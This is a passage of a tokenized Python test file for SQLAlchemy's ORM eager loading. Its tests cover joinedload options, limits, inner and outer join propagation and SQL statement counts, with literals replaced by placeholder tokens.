<NUM_LIT:1> ) . offset ( <NUM_LIT:0> ) <EOL> eq_ ( [ <EOL> User ( id = <NUM_LIT:7> , <EOL> orders = [ Order ( id = <NUM_LIT:1> ) , Order ( id = <NUM_LIT:3> ) , Order ( id = <NUM_LIT:5> ) ] , <EOL> addresses = [ Address ( id = <NUM_LIT:1> ) ] <EOL> ) <EOL> ] , l . all ( ) ) <EOL> def test_limit_4 ( self ) : <EOL> User , Order , addresses , users , orders = ( self . classes . User , <EOL> self . classes . Order , <EOL> self . tables . addresses , <EOL> self . tables . users , <EOL> self . tables . orders ) <EOL> sel = sa . select ( [ users , addresses . c . email_address ] , <EOL> users . c . id == addresses . c . user_id ) . alias ( '<STR_LIT>' ) <EOL> mapper ( User , sel , properties = { <EOL> '<STR_LIT>' : relationship ( <EOL> Order , primaryjoin = sel . c . id == orders . c . user_id , <EOL> lazy = '<STR_LIT>' , order_by = orders . c . id ) <EOL> } ) <EOL> mapper ( Order , orders ) <EOL> sess = create_session ( ) <EOL> eq_ ( sess . query ( User ) . first ( ) , <EOL> User ( name = '<STR_LIT>' , orders = [ <EOL> Order ( <EOL> address_id = <NUM_LIT:1> , <EOL> description = '<STR_LIT>' , <EOL> isopen = <NUM_LIT:0> , <EOL> user_id = <NUM_LIT:7> , <EOL> id = <NUM_LIT:1> ) , <EOL> Order ( <EOL> address_id = <NUM_LIT:1> , <EOL> description = '<STR_LIT>' , <EOL> isopen = <NUM_LIT:1> , <EOL> user_id = <NUM_LIT:7> , <EOL> id = <NUM_LIT:3> ) , <EOL> Order ( <EOL> address_id = None , description = '<STR_LIT>' , isopen = <NUM_LIT:0> , <EOL> user_id = <NUM_LIT:7> , id = <NUM_LIT:5> ) ] , <EOL> email_address = '<STR_LIT>' , id = <NUM_LIT:7> ) <EOL> ) <EOL> def test_useget_cancels_eager ( self ) : <EOL> """<STR_LIT>""" <EOL> users , Address , addresses , User = ( <EOL> self . tables . users , <EOL> self . classes . Address , <EOL> self . tables . addresses , <EOL> self . classes . User ) <EOL> mapper ( User , users ) <EOL> mapper ( Address , addresses , properties = { <EOL> '<STR_LIT:user>' : relationship ( User , lazy = '<STR_LIT>' , backref = '<STR_LIT>' ) <EOL> } ) <EOL> sess = create_session ( ) <EOL> u1 = sess . query ( User ) . filter ( User . id == <NUM_LIT:8> ) . one ( ) <EOL> def go ( ) : <EOL> eq_ ( u1 . addresses [ <NUM_LIT:0> ] . user , u1 ) <EOL> self . assert_sql_execution ( <EOL> testing . db , go , <EOL> CompiledSQL ( <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" , <EOL> { '<STR_LIT>' : <NUM_LIT:8> } ) <EOL> ) <EOL> def test_manytoone_limit ( self ) : <EOL> """<STR_LIT>""" <EOL> users , items , order_items , Order , Item , User , Address , orders , addresses = ( <EOL> self . tables . users , <EOL> self . tables . items , <EOL> self . tables . order_items , <EOL> self . classes . Order , <EOL> self . classes . Item , <EOL> self . classes . User , <EOL> self . classes . Address , <EOL> self . tables . orders , <EOL> self . tables . addresses ) <EOL> mapper ( User , users , properties = odict ( <EOL> orders = relationship ( Order , backref = '<STR_LIT:user>' ) <EOL> ) ) <EOL> mapper ( Order , orders , properties = odict ( [ <EOL> ( '<STR_LIT>' , relationship ( Item , secondary = order_items , <EOL> backref = '<STR_LIT>' ) ) , <EOL> ( '<STR_LIT:address>' , relationship ( Address ) ) <EOL> ] ) ) <EOL> mapper ( Address , addresses ) <EOL> mapper ( Item , items ) <EOL> sess = create_session ( ) <EOL> self . assert_compile ( <EOL> sess . query ( User ) . options ( joinedload ( User . orders ) ) . limit ( <NUM_LIT:10> ) , <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" , <EOL> { '<STR_LIT>' : <NUM_LIT:10> } <EOL> ) <EOL> self . assert_compile ( <EOL> sess . query ( Order ) . options ( joinedload ( Order . user ) ) . limit ( <NUM_LIT:10> ) , <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" , <EOL> { '<STR_LIT>' : <NUM_LIT:10> } <EOL> ) <EOL> self . assert_compile ( <EOL> sess . query ( Order ) . options ( <EOL> joinedload ( Order . user , innerjoin = True ) ) . limit ( <NUM_LIT:10> ) , <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" , <EOL> { '<STR_LIT>' : <NUM_LIT:10> } <EOL> ) <EOL> self . assert_compile ( <EOL> sess . query ( User ) . options ( <EOL> joinedload_all ( "<STR_LIT>" ) ) . limit ( <NUM_LIT:10> ) , <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" , <EOL> { '<STR_LIT>' : <NUM_LIT:10> } <EOL> ) <EOL> self . assert_compile ( <EOL> sess . query ( User ) . options ( joinedload_all ( "<STR_LIT>" ) , <EOL> joinedload ( "<STR_LIT>" ) ) , <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> ) <EOL> self . assert_compile ( <EOL> sess . query ( User ) . options ( <EOL> joinedload ( "<STR_LIT>" ) , <EOL> joinedload ( <EOL> "<STR_LIT>" , <EOL> innerjoin = True ) ) . limit ( <NUM_LIT:10> ) , <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" , <EOL> { '<STR_LIT>' : <NUM_LIT:10> } <EOL> ) <EOL> self . assert_compile ( <EOL> sess . query ( User ) . options ( <EOL> joinedload ( "<STR_LIT>" , innerjoin = True ) , <EOL> joinedload ( "<STR_LIT>" , innerjoin = True ) ) . limit ( <NUM_LIT:10> ) , <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" , <EOL> { '<STR_LIT>' : <NUM_LIT:10> } <EOL> ) <EOL> def test_one_to_many_scalar ( self ) : <EOL> Address , addresses , users , User = ( self . classes . Address , <EOL> self . tables . addresses , <EOL> self . tables . users , <EOL> self . classes . User ) <EOL> mapper ( User , users , properties = dict ( <EOL> address = relationship ( mapper ( Address , addresses ) , <EOL> lazy = '<STR_LIT>' , uselist = False ) <EOL> ) ) <EOL> q = create_session ( ) . query ( User ) <EOL> def go ( ) : <EOL> l = q . filter ( users . c . id == <NUM_LIT:7> ) . all ( ) <EOL> eq_ ( [ User ( id = <NUM_LIT:7> , address = Address ( id = <NUM_LIT:1> ) ) ] , l ) <EOL> self . assert_sql_count ( testing . db , go , <NUM_LIT:1> ) <EOL> def test_one_to_many_scalar_subq_wrapping ( self ) : <EOL> Address , addresses , users , User = ( self . classes . Address , <EOL> self . tables . addresses , <EOL> self . tables . users , <EOL> self . classes . User ) <EOL> mapper ( User , users , properties = dict ( <EOL> address = relationship ( mapper ( Address , addresses ) , <EOL> lazy = '<STR_LIT>' , uselist = False ) <EOL> ) ) <EOL> q = create_session ( ) . query ( User ) <EOL> q = q . filter ( users . c . id == <NUM_LIT:7> ) . limit ( <NUM_LIT:1> ) <EOL> self . assert_compile ( <EOL> q , <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" , <EOL> checkparams = { '<STR_LIT>' : <NUM_LIT:7> , '<STR_LIT>' : <NUM_LIT:1> } <EOL> ) <EOL> def test_many_to_one ( self ) : <EOL> users , Address , addresses , User = ( <EOL> self . tables . users , <EOL> self . classes . Address , <EOL> self . tables . addresses , <EOL> self . classes . User ) <EOL> mapper ( Address , addresses , properties = dict ( <EOL> user = relationship ( mapper ( User , users ) , lazy = '<STR_LIT>' ) <EOL> ) ) <EOL> sess = create_session ( ) <EOL> q = sess . query ( Address ) <EOL> def go ( ) : <EOL> a = q . filter ( addresses . c . id == <NUM_LIT:1> ) . one ( ) <EOL> is_not_ ( a . user , None ) <EOL> u1 = sess . query ( User ) . get ( <NUM_LIT:7> ) <EOL> is_ ( a . user , u1 ) <EOL> self . assert_sql_count ( testing . db , go , <NUM_LIT:1> ) <EOL> def test_many_to_one_null ( self ) : <EOL> """<STR_LIT>""" <EOL> Order , Address , addresses , orders = ( self . classes . Order , <EOL> self . classes . Address , <EOL> self . tables . addresses , <EOL> self . tables . orders ) <EOL> mapper ( Order , orders , properties = dict ( <EOL> address = relationship ( <EOL> mapper ( Address , addresses ) , <EOL> primaryjoin = and_ ( <EOL> addresses . c . id == orders . c . address_id , <EOL> addresses . c . email_address != None <EOL> ) , <EOL> lazy = '<STR_LIT>' ) <EOL> ) ) <EOL> sess = create_session ( ) <EOL> def go ( ) : <EOL> o1 = sess . query ( Order ) . options ( <EOL> lazyload ( '<STR_LIT:address>' ) ) . filter ( <EOL> Order . id == <NUM_LIT:5> ) . one ( ) <EOL> eq_ ( o1 . address , None ) <EOL> self . assert_sql_count ( testing . db , go , <NUM_LIT:2> ) <EOL> sess . expunge_all ( ) <EOL> def go ( ) : <EOL> o1 = sess . query ( Order ) . filter ( Order . id == <NUM_LIT:5> ) . one ( ) <EOL> eq_ ( o1 . address , None ) <EOL> self . assert_sql_count ( testing . db , go , <NUM_LIT:1> ) <EOL> def test_one_and_many ( self ) : <EOL> """<STR_LIT>""" <EOL> users , items , order_items , orders , Item , User , Order = ( <EOL> self . tables . users , <EOL> self . tables . items , <EOL> self . tables . order_items , <EOL> self . tables . orders , <EOL> self . classes . Item , <EOL> self . classes . User , <EOL> self . classes . Order ) <EOL> mapper ( User , users , properties = { <EOL> '<STR_LIT>' : relationship ( Order , lazy = '<STR_LIT>' , order_by = orders . c . id ) <EOL> } ) <EOL> mapper ( Item , items ) <EOL> mapper ( Order , orders , properties = dict ( <EOL> items = relationship ( <EOL> Item , <EOL> secondary = order_items , <EOL> lazy = '<STR_LIT>' , <EOL> order_by = items . c . id ) <EOL> ) ) <EOL> q = create_session ( ) . query ( User ) <EOL> l = q . filter ( text ( "<STR_LIT>" ) ) . order_by ( text ( "<STR_LIT>" ) ) <EOL> def go ( ) : <EOL> eq_ ( self . static . user_order_result [ <NUM_LIT:0> : <NUM_LIT:3> ] , l . all ( ) ) <EOL> self . assert_sql_count ( testing . db , go , <NUM_LIT:1> ) <EOL> def test_double_with_aggregate ( self ) : <EOL> User , users , orders , Order = ( self . classes . User , <EOL> self . tables . users , <EOL> self . tables . orders , <EOL> self . classes . Order ) <EOL> max_orders_by_user = sa . select ( [ <EOL> sa . func . max ( orders . c . id ) . label ( '<STR_LIT>' ) ] , <EOL> group_by = [ orders . c . user_id ] <EOL> ) . alias ( '<STR_LIT>' ) <EOL> max_orders = orders . select ( <EOL> orders . c . id == max_orders_by_user . c . order_id ) . alias ( '<STR_LIT>' ) <EOL> mapper ( Order , orders ) <EOL> mapper ( User , users , properties = { <EOL> '<STR_LIT>' : relationship ( Order , backref = '<STR_LIT:user>' , lazy = '<STR_LIT>' , <EOL> order_by = orders . c . id ) , <EOL> '<STR_LIT>' : relationship ( <EOL> mapper ( Order , max_orders , non_primary = True ) , <EOL> lazy = '<STR_LIT>' , uselist = False ) <EOL> } ) <EOL> q = create_session ( ) . query ( User ) <EOL> def go ( ) : <EOL> eq_ ( [ <EOL> User ( id = <NUM_LIT:7> , orders = [ <EOL> Order ( id = <NUM_LIT:1> ) , <EOL> Order ( id = <NUM_LIT:3> ) , <EOL> Order ( id = <NUM_LIT:5> ) , <EOL> ] , <EOL> max_order = Order ( id = <NUM_LIT:5> ) <EOL> ) , <EOL> User ( id = <NUM_LIT:8> , orders = [ ] ) , <EOL> User ( id = <NUM_LIT:9> , orders = [ Order ( id = <NUM_LIT:2> ) , Order ( id = <NUM_LIT:4> ) ] , <EOL> max_order = Order ( id = <NUM_LIT:4> ) <EOL> ) , <EOL> User ( id = <NUM_LIT:10> ) , <EOL> ] , q . order_by ( User . id ) . all ( ) ) <EOL> self . assert_sql_count ( testing . db , go , <NUM_LIT:1> ) <EOL> def test_uselist_false_warning ( self ) : <EOL> """<STR_LIT>""" <EOL> User , users , orders , Order = ( self . classes . User , <EOL> self . tables . users , <EOL> self . tables . orders , <EOL> self . classes . Order ) <EOL> mapper ( User , users , properties = { <EOL> '<STR_LIT>' : relationship ( Order , uselist = False ) <EOL> } ) <EOL> mapper ( Order , orders ) <EOL> s = create_session ( ) <EOL> assert_raises ( sa . exc . SAWarning , <EOL> s . query ( User ) . options ( joinedload ( User . order ) ) . all ) <EOL> def test_wide ( self ) : <EOL> users , items , order_items , Order , Item , User , Address , orders , addresses = ( <EOL> self . tables . users , <EOL> self . tables . items , <EOL> self . tables . order_items , <EOL> self . classes . Order , <EOL> self . classes . Item , <EOL> self . classes . User , <EOL> self . classes . Address , <EOL> self . tables . orders , <EOL> self . tables . addresses ) <EOL> mapper ( <EOL> Order , orders , properties = { <EOL> '<STR_LIT>' : relationship ( <EOL> Item , secondary = order_items , lazy = '<STR_LIT>' , <EOL> order_by = items . c . id ) } ) <EOL> mapper ( Item , items ) <EOL> mapper ( User , users , properties = dict ( <EOL> addresses = relationship ( <EOL> mapper ( <EOL> Address , <EOL> addresses ) , <EOL> lazy = False , <EOL> order_by = addresses . c . id ) , <EOL> orders = relationship ( Order , lazy = False , order_by = orders . c . id ) , <EOL> ) ) <EOL> q = create_session ( ) . query ( User ) <EOL> def go ( ) : <EOL> eq_ ( self . static . user_all_result , q . order_by ( User . id ) . all ( ) ) <EOL> self . assert_sql_count ( testing . db , go , <NUM_LIT:1> ) <EOL> def test_against_select ( self ) : <EOL> """<STR_LIT>""" <EOL> users , items , order_items , orders , Item , User , Order = ( <EOL> self . tables . users , <EOL> self . tables . items , <EOL> self . tables . order_items , <EOL> self . tables . orders , <EOL> self . classes . Item , <EOL> self . classes . User , <EOL> self . classes . Order ) <EOL> s = sa . select ( [ orders ] , orders . c . isopen == <NUM_LIT:1> ) . alias ( '<STR_LIT>' ) <EOL> mapper ( Order , s , properties = { <EOL> '<STR_LIT:user>' : relationship ( User , lazy = '<STR_LIT>' ) <EOL> } ) <EOL> mapper ( User , users ) <EOL> mapper ( Item , items ) <EOL> q = create_session ( ) . query ( Order ) <EOL> eq_ ( [ <EOL> Order ( id = <NUM_LIT:3> , user = User ( id = <NUM_LIT:7> ) ) , <EOL> Order ( id = <NUM_LIT:4> , user = User ( id = <NUM_LIT:9> ) ) <EOL> ] , q . all ( ) ) <EOL> q = q . select_from ( s . join ( order_items ) . join ( items ) ) . filter ( <EOL> ~ Item . id . in_ ( [ <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT:5> ] ) ) <EOL> eq_ ( [ <EOL> Order ( id = <NUM_LIT:3> , user = User ( id = <NUM_LIT:7> ) ) , <EOL> ] , q . all ( ) ) <EOL> def test_aliasing ( self ) : <EOL> """<STR_LIT>""" <EOL> Address , addresses , users , User = ( self . classes . Address , <EOL> self . tables . addresses , <EOL> self . tables . users , <EOL> self . classes . User ) <EOL> mapper ( User , users , properties = dict ( <EOL> addresses = relationship ( mapper ( Address , addresses ) , <EOL> lazy = '<STR_LIT>' , order_by = addresses . c . id ) <EOL> ) ) <EOL> q = create_session ( ) . query ( User ) <EOL> l = q . filter ( addresses . c . email_address == '<STR_LIT>' ) . filter ( <EOL> Address . user_id == User . id ) . order_by ( User . id ) <EOL> eq_ ( self . static . user_address_result [ <NUM_LIT:1> : <NUM_LIT:2> ] , l . all ( ) ) <EOL> def test_inner_join ( self ) : <EOL> Address , addresses , users , User = ( self . classes . Address , <EOL> self . tables . addresses , <EOL> self . tables . users , <EOL> self . classes . User ) <EOL> mapper ( User , users , properties = dict ( <EOL> addresses = relationship ( mapper ( Address , addresses ) , lazy = '<STR_LIT>' , <EOL> innerjoin = True , order_by = addresses . c . id ) <EOL> ) ) <EOL> sess = create_session ( ) <EOL> eq_ ( <EOL> [ User ( id = <NUM_LIT:7> , addresses = [ Address ( id = <NUM_LIT:1> ) ] ) , <EOL> User ( id = <NUM_LIT:8> , <EOL> addresses = [ Address ( id = <NUM_LIT:2> , email_address = '<STR_LIT>' ) , <EOL> Address ( id = <NUM_LIT:3> , email_address = '<STR_LIT>' ) , <EOL> Address ( id = <NUM_LIT:4> , email_address = '<STR_LIT>' ) , ] ) , <EOL> User ( id = <NUM_LIT:9> , addresses = [ Address ( id = <NUM_LIT:5> ) ] ) ] , sess . query ( User ) . all ( ) <EOL> ) <EOL> self . assert_compile ( <EOL> sess . query ( User ) , <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> def test_inner_join_unnested_chaining_options ( self ) : <EOL> users , items , order_items , Order , Item , User , orders = ( <EOL> self . tables . users , <EOL> self . tables . items , <EOL> self . tables . order_items , <EOL> self . classes . Order , <EOL> self . classes . Item , <EOL> self . classes . User , <EOL> self . tables . orders ) <EOL> mapper ( User , users , properties = dict ( <EOL> orders = relationship ( Order , innerjoin = "<STR_LIT>" , <EOL> lazy = False ) <EOL> ) ) <EOL> mapper ( Order , orders , properties = dict ( <EOL> items = relationship ( Item , secondary = order_items , lazy = False , <EOL> innerjoin = "<STR_LIT>" ) <EOL> ) ) <EOL> mapper ( Item , items ) <EOL> sess = create_session ( ) <EOL> self . assert_compile ( <EOL> sess . query ( User ) , <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> ) <EOL> self . assert_compile ( <EOL> sess . query ( User ) . options ( joinedload ( User . orders , innerjoin = False ) ) , <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> ) <EOL> self . assert_compile ( <EOL> sess . query ( User ) . options ( <EOL> joinedload ( <EOL> User . orders , <EOL> Order . items , <EOL> innerjoin = False ) ) , <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> ) <EOL> def test_inner_join_nested_chaining_negative_options ( self ) : <EOL> users , items , order_items , Order , Item , User , orders = ( <EOL> self . tables . users , <EOL> self . tables . items , <EOL> self . tables . order_items , <EOL> self . classes . Order , <EOL> self . classes . Item , <EOL> self . classes . User , <EOL> self . tables . orders ) <EOL> mapper ( User , users , properties = dict ( <EOL> orders = relationship ( Order , innerjoin = True , <EOL> lazy = False , order_by = orders . c . id ) <EOL> ) ) <EOL> mapper ( Order , orders , properties = dict ( <EOL> items = relationship ( Item , secondary = order_items , lazy = False , <EOL> innerjoin = True , order_by = items . c . id ) <EOL> ) ) <EOL> mapper ( Item , items ) <EOL> sess = create_session ( ) <EOL> self . assert_compile ( <EOL> sess . query ( User ) , <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> ) <EOL> q = sess . query ( User ) . options ( joinedload ( User . orders , innerjoin = False ) ) <EOL> self . assert_compile ( <EOL> q , <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> ) <EOL> eq_ ( <EOL> [ <EOL> User ( id = <NUM_LIT:7> , <EOL> orders = [ <EOL> Order ( <EOL> id = <NUM_LIT:1> , items = [ <EOL> Item ( <EOL> id = <NUM_LIT:1> ) , Item ( <EOL> id = <NUM_LIT:2> ) , Item ( <EOL> id = <NUM_LIT:3> ) ] ) , <EOL> Order ( <EOL> id = <NUM_LIT:3> , items = [ <EOL> Item ( <EOL> id = <NUM_LIT:3> ) , Item ( <EOL> id = <NUM_LIT:4> ) , Item ( <EOL> id = <NUM_LIT:5> ) ] ) , <EOL> Order ( id = <NUM_LIT:5> , items = [ Item ( id = <NUM_LIT:5> ) ] ) ] ) , <EOL> User ( id = <NUM_LIT:8> , orders = [ ] ) , <EOL> User ( id = <NUM_LIT:9> , orders = [ <EOL> Order ( id = <NUM_LIT:2> , items = [ Item ( id = <NUM_LIT:1> ) , Item ( id = <NUM_LIT:2> ) , Item ( id = <NUM_LIT:3> ) ] ) , <EOL> Order ( id = <NUM_LIT:4> , items = [ Item ( id = <NUM_LIT:1> ) , Item ( id = <NUM_LIT:5> ) ] ) <EOL> ] <EOL> ) , <EOL> User ( id = <NUM_LIT:10> , orders = [ ] ) <EOL> ] , <EOL> q . order_by ( User . id ) . all ( ) <EOL> ) <EOL> self . assert_compile ( <EOL> sess . query ( User ) . options ( <EOL> joinedload ( <EOL> User . orders , <EOL> Order . items , <EOL> innerjoin = False ) ) , <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> ) <EOL> def test_inner_join_nested_chaining_positive_options ( self ) : <EOL> users , items , order_items , Order , Item , User , orders = ( <EOL> self . tables . users , <EOL> self . tables . items , <EOL> self . tables . order_items , <EOL> self . classes . Order , <EOL> self . classes . Item , <EOL> self . classes . User , <EOL> self . tables . orders ) <EOL> mapper ( User , users , properties = dict ( <EOL> orders = relationship ( Order , order_by = orders . c . id ) <EOL> ) ) <EOL> mapper ( Order , orders , properties = dict ( <EOL> items = relationship ( <EOL> Item , <EOL> secondary = order_items , <EOL> order_by = items . c . id ) <EOL> ) ) <EOL> mapper ( Item , items ) <EOL> sess = create_session ( ) <EOL> q = sess . query ( User ) . options ( <EOL> joinedload ( "<STR_LIT>" , innerjoin = False ) . <EOL> joinedload ( "<STR_LIT>" , innerjoin = True ) <EOL> ) <EOL> self . assert_compile ( <EOL> q , <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> ) <EOL> eq_ ( <EOL> [ <EOL> User ( id = <NUM_LIT:7> , <EOL> orders = [ <EOL> Order ( <EOL> id = <NUM_LIT:1> , items = [ <EOL> Item ( <EOL> id = <NUM_LIT:1> ) , Item ( <EOL> id = <NUM_LIT:2> ) , Item ( <EOL> id = <NUM_LIT:3> ) ] ) , <EOL> Order ( <EOL> id = <NUM_LIT:3> , items = [ <EOL> Item ( <EOL> id = <NUM_LIT:3> ) , Item ( <EOL> id = <NUM_LIT:4> ) , Item ( <EOL> id = <NUM_LIT:5> ) ] ) , <EOL> Order ( id = <NUM_LIT:5> , items = [ Item ( id = <NUM_LIT:5> ) ] ) ] ) , <EOL> User ( id = <NUM_LIT:8> , orders = [ ] ) , <EOL> User ( id = <NUM_LIT:9> , orders = [ <EOL> Order ( id = <NUM_LIT:2> , items = [ Item ( id = <NUM_LIT:1> ) , Item ( id = <NUM_LIT:2> ) , Item ( id = <NUM_LIT:3> ) ] ) , <EOL> Order ( id = <NUM_LIT:4> , items = [ Item ( id = <NUM_LIT:1> ) , Item ( id = <NUM_LIT:5> ) ] ) <EOL> ] <EOL> ) , <EOL> User ( id = <NUM_LIT:10> , orders = [ ] ) <EOL> ] , <EOL> q . order_by ( User . id ) . all ( ) <EOL> ) <EOL> def test_unnested_outerjoin_propagation_only_on_correct_path ( self ) : <EOL> User , users = self . classes . User , self . tables . users <EOL> Order , orders = self . classes . Order , self . tables . orders <EOL> Address , addresses = self . classes . Address , self . tables . addresses <EOL> mapper ( User , users , properties = odict ( [ <EOL> ( '<STR_LIT>' , relationship ( Order ) ) , <EOL> ( '<STR_LIT>' , relationship ( Address ) ) <EOL> ] ) ) <EOL> mapper ( Order , orders ) <EOL> mapper ( Address , addresses ) <EOL> sess = create_session ( ) <EOL> q = sess . query ( User ) . options ( <EOL> joinedload ( "<STR_LIT>" ) , <EOL> joinedload ( "<STR_LIT>" , innerjoin = "<STR_LIT>" ) , <EOL> ) <EOL> self . assert_compile ( <EOL> q , <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> ) <EOL> def test_nested_outerjoin_propagation_only_on_correct_path ( self ) : <EOL> User , users = self . classes . User , self . tables . users <EOL> Order , orders = self . classes . Order , self . tables . orders <EOL> Address , addresses = self . classes . Address , self . tables . addresses <EOL> mapper ( User , users , properties = odict ( [ <EOL> ( '<STR_LIT>' , relationship ( Order ) ) , <EOL> ( '<STR_LIT>' , relationship ( Address ) ) <EOL> ] ) ) <EOL> mapper ( Order , orders ) <EOL> mapper ( Address , addresses ) <EOL> sess = create_session ( ) <EOL> q = sess . query ( User ) . options ( <EOL> joinedload ( "<STR_LIT>" ) , <EOL> joinedload ( "<STR_LIT>" , innerjoin = True ) , <EOL> ) <EOL> self . assert_compile ( <EOL> q , <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> ) <EOL> def test_catch_the_right_target ( self ) : <EOL> users , Keyword , orders , items , order_items , Order , Item , User , keywords , item_keywords = ( <EOL> self . tables . users , <EOL> self . classes . Keyword , <EOL> self . tables . orders , <EOL> self . tables . items , <EOL> self . tables . order_items , <EOL> self . classes . Order , <EOL> self . classes . Item , <EOL> self . classes . User , <EOL> self . tables . keywords , <EOL> self . tables . item_keywords ) <EOL> mapper ( User , users , properties = { <EOL> '<STR_LIT>' : relationship ( Order , backref = '<STR_LIT:user>' ) , <EOL> } ) 